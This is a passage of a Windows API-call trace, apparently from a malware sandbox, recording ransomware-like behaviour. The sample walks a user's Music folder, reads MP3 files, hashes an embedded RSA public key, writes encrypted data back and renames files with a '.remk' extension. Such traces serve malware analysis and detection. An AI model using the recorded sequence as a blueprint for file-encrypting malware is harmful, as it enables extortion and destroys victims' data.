dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0232.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee190 [0232.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0232.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee220 [0232.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0232.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0232.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1f0 [0232.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1d8 [0232.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee238 [0232.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1d8 | out: hHeap=0x630000) returned 1 [0232.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee1d8 [0232.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1f0 | out: hHeap=0x630000) returned 1 [0232.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0232.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0232.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0232.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1a8 | out: hHeap=0x630000) returned 1 [0232.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1a8 [0232.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0232.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee208 | out: hHeap=0x630000) returned 1 [0232.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0232.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee238 | out: hHeap=0x630000) returned 1 [0232.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0232.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0232.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0232.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0232.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1a8 | out: hHeap=0x630000) returned 1 [0232.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0232.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0232.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1d8 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee220 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1c0 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee190 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0232.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0232.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee178 | out: hHeap=0x630000) returned 1 [0232.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c1f38 | out: hHeap=0x630000) returned 1 [0232.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0232.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0232.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0232.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0232.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0232.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.448] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x16d74, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x16d74, lpOverlapped=0x0) returned 1 [0232.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0232.504] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x16d79, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.505] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0232.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0232.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0232.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.532] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0232.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.532] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.532] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.532] CloseHandle (hObject=0x640) returned 1 [0232.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ec8 [0232.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x37b5b70 [0232.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3ec8 | out: hHeap=0x630000) returned 1 [0232.539] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DOr_ T9_U6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dor_ t9_u6.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DOr_ T9_U6.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dor_ t9_u6.mp3.remk")) returned 1 [0232.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.540] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0232.542] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb45a070, ftCreationTime.dwHighDateTime=0x1d5e5a0, ftLastAccessTime.dwLowDateTime=0x33040740, ftLastAccessTime.dwHighDateTime=0x1d5dc64, ftLastWriteTime.dwLowDateTime=0x33040740, ftLastWriteTime.dwHighDateTime=0x1d5dc64, nFileSizeHigh=0x0, nFileSizeLow=0x56fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="erxVno osH7s5.mp3", cAlternateFileName="ERXVNO~1.MP3")) returned 1 [0232.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0232.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.542] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\erxVno osH7s5.mp3") returned=".mp3" [0232.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\erxVno osH7s5.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\erxvno osh7s5.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.549] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=22269) returned 1 [0232.550] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.552] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x56d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.552] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.561] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.561] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x56fd, lpOverlapped=0x0) returned 1 [0232.562] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.562] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.562] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.562] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.564] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.565] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.565] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.565] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.577] GetLastError () returned 0x0 [0232.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.594] GetLastError () returned 0x0 [0232.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0232.594] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.594] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.594] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.595] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.595] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5700) returned 0x37bb408 [0232.595] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0232.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0232.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0232.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0232.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1f38 [0232.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee178 [0232.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1f80 [0232.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee190 [0232.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1c0 [0232.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee220 [0232.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1d8 [0232.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0232.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0232.612] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1c0 | out: hHeap=0x630000) returned 1 [0232.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1d8 | out: hHeap=0x630000) returned 1 [0232.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee220 | out: hHeap=0x630000) returned 1 [0232.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee220 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee1d8 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee1c0 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1d8 | out: hHeap=0x630000) returned 1 [0232.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1c0 | out: hHeap=0x630000) returned 1 [0232.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee220 | out: hHeap=0x630000) returned 1 [0232.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0232.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0232.614] GetCurrentThreadId () returned 0x314 [0232.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0232.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b8ff0 [0232.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0232.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0232.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0232.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0232.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.614] GetCurrentThreadId () returned 0x314 [0232.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0232.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee220 [0232.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.615] RtlAllocateHeap 